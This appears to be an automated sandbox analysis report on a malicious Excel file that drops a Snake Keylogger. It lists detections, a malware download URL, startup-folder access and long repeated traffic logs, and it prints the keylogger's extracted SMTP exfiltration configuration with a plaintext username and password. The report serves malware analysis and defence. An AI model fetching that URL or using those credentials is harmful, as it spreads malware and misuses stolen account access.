Windows Analysis Report
7qsPAygCOx.xlsx

AV Detection

Source: 7qsPAygCOx.xlsx	Avira: detected
Source: 7qsPAygCOx.xlsx	Avira: detected

Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe

Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Roaming\svcost.exe

Avira: detection malicious, Label: HEUR/AGEN.1310409

Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

ReversingLabs: Detection: 68%

Source: 7qsPAygCOx.xlsx

ReversingLabs: Detection: 47%

Source: C:\Users\user\AppData\Roaming\svcost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Joe Sandbox ML: detected

Source: 7qsPAygCOx.xlsx

Joe Sandbox ML: detected

Compliance

Source: unknown

HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\			Jump to behavior

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00460D90h		5_2_00460CD8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00640944h		5_2_006408A8
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00640944h		5_2_00640AFE
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00640944h		5_2_00640C56
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00AAB60Bh		5_2_00AAB401
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then jmp 00AAB60Bh		5_2_00AAB410
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		5_2_04A7DB88
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00690944h		8_2_006908A8
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00690944h		8_2_00690898
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 00690944h		8_2_00690C56
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 0069F5D0h		8_2_0069F518
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 0212B60Bh		8_2_0212B410
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then jmp 0212B60Bh		8_2_0212B401
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		8_2_044BDB88

Source: global traffic

DNS query: name: cia.tf

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
